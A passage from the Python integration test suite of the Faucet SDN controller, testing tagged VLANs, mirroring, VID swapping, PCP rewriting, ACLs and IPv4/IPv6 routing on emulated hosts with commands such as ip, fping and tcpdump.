mirror_host = self.hosts_name_ordered()[3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = CONFIG_TAGGED_BOILER
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=4, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_tagged(self):
# Untagged traffic specifically dropped.
for host in self.hosts_name_ordered():
host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
for port in self.port_map.values():
self.wait_nonzero_packet_count_flow(
{'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
def test_tagged(self):
for host in self.hosts_name_ordered():
scapy_txt = host.cmd(
('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
super().test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
# port 3 will mirror port 1
mirror: %(port_1)d
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.flap_all_switch_ports()
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
tagged_ports = (self.port_map['port_1'], self.port_map['port_2'], self.port_map['port_4'])
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
self.change_port_config(
self.port_map['port_3'], 'mirror', None,
restart=True, cold_start=False)
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
- set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for down host.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
# next host routes via FAUCET for other host in same connected subnet
# to cause routing to be exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
self.verify_drop_rules(required_ipds, ipd_to_macvlan)
self.verify_routing_performance(first_host, second_host)
self.verify_l3_mesh(first_host, second_host)
self.verify_l3_hairpin(first_host)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
IPV = 6
NETPREFIX = 112
ETH_TYPE = IPV6_ETH
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 103))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
def netbase(self, vid, host):
return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))
def fib_table(self):
return self._IPV6_FIB_TABLE
def fping(self, macvlan_int, ipg):
return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv6_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
VIDS = _vids()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
(' %u:',
' description: "tagged"')) % i for i in VIDS])
CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
'%(port_2)d', ','.join(STR_VIDS),
'%(port_3)d', ','.join(STR_VIDS),
'%(port_4)d', ','.join(STR_VIDS))
def test_tagged(self):
self.ping_all_when_learned()
for host in self.hosts_name_ordered():
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
setup_commands.extend([
'ip link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid),
'ip link set dev %s up' % vlan_int])
self.quiet_commands(host, setup_commands)
for host in self.hosts_name_ordered():
rdisc6_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
rdisc6_commands.append(
'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
self.quiet_commands(host, rdisc6_commands)
for vlan in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
for _ in range(3):
for host in self.hosts_name_ordered():
self.quiet_commands(
host,
['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
vlan_hosts_learned = self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': str(vlan)})
if vlan_hosts_learned == len(self.hosts_name_ordered()):
break
time.sleep(1)
self.assertGreater(
vlan_hosts_learned, 1,
msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
def test_tagged(self):
super().test_tagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
self.verify_broadcast((ext_port1, ext_port2), False)
self.verify_broadcast((int_port1, int_port2), True)
self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""
def test_tagged(self):
self.ping_all_when_learned()
native_ips = [
ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
for native_ip in native_ips:
if native_ip != own_native_ip:
self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'icmp and ether dst 06:06:06:06:06:06 and not vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'icmp and ether dst 06:06:06:06:06:06 and not vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""
def test_tagged(self):
self._enable_event_log()
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
for _coldstart in range(2):
for _swaps in range(3):
self.verify_ipv4_routing(
first_host, first_host_routed_ip,
second_host, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
# change of a VLAN/ports not involved in routing, should be a warm start.
for vid in (300, 200):
self.change_port_config(
self.port_map['port_4'], 'native_vlan', vid,
restart=True, cold_start=False)
self.wait_until_matching_lines_from_file(
r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
